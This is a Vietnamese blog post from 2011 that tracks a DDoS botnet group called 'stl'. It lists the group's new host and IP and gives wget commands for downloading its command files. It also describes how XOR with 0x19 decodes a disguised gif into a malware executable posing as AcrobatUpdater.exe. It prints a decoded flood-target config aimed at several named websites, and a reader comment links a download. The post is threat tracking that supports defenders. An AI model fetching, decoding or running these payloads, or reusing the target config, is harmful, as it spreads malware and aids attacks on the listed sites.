Thứ Bảy, 20 tháng 8, 2011

Thêm một host mới của stl

Ngày 18-08, stl bắt đầu đăng ký host mới: high.paploz.com, IP: 46.166.147.48, cũng đăng ký tại ISP Sandrex của Nga, nơi đặt hầu hết các host chính của stl.
"Sống chết theo lệnh" đặt 2 file quen thuộc lên đấy, vào lúc 3:15 chiều: xc.jpg, xv.jpg. Với wget, chúng ta có thể down về như sau:
  1. wget -t3 "http://high.paploz.com/xv.jpg" -U"An0nym0453"
  2. wget -t3 "http://high.paploz.com/xc.jpg" -U"An0nym0453"
File images01.gif tại http://penop.net/images01.gif cũng được cập nhật vào cùng ngày giờ. Sau khi xor toàn bộ content của file gif này, từng byte với 0x19, chúng ta sẽ được file AcrobatUpdater.exe mới, khác một chút ít với các AcrobatUpdater.exe cũ, nhưng vẫn là món cũ xào nấu lại, thêm mắm, thêm muối, bớt đường bớt bột ngọt, và dở vẫn là dở. Có lẽ đầu bếp của stl hết sách, hết món mới rồi.
Nội dung file xv.jpg: 2011-08-18 15:22:46
Một phần nội dung file xc.jpg sau khi đã được giãi mã:
<targets>
<item enabled="1" threads="5" delay="2" method="GET" protocol="http" host="www.hvaonline.net" port="80" rootURI="/" uri="/hvaonline/forums/list.hva" keepCookies="1" crawling="0" referer="http://www.hvaonline.net/tof/">
<runners>
<item uri="/" referer=""/>
<item uri="/toforum" referer="http://www.hvaonline.net/"/>
<item uri="/hvaonline/forums/list.hva" referer="http://www.hvaonline.net/tof/"/>
<item enabled="0" threads="5" delay="5" method="GET" protocol="http" host="www.x-cafevn.org" port="80"  uri="/" keepCookies="1" crawling="0" referer=""/>
<item enabled="0" threads="5" delay="5" method="GET" protocol="http" host="www.tienve.org" port="80"  uri="/" keepCookies="1" crawling="0" referer=""/>
<item enabled="0" threads="5" delay="5" method="GET" protocol="http" host="www.viettan.org" port="80"  uri="/" keepCookies="1" crawling="0" referer=""/>
</runners>
</item>
</targets>
Vẫn là code cũ, config cũ, quay đi quay lại vẫn nhiêu đó, chán lắm rồi mấy anh stl ơi. Mấy anh dẹp ba cái trò này giùm cái, càng cố làm thì càng làm trò cười cho người khác.

1 nhận xét:

  1. Vì không có nick ở HVA nên tôi gởi file bạn cần tại đây
    http://www.mediafire.com/?mqqyhp6ubfp3em6
    Thân

    Trả lờiXóa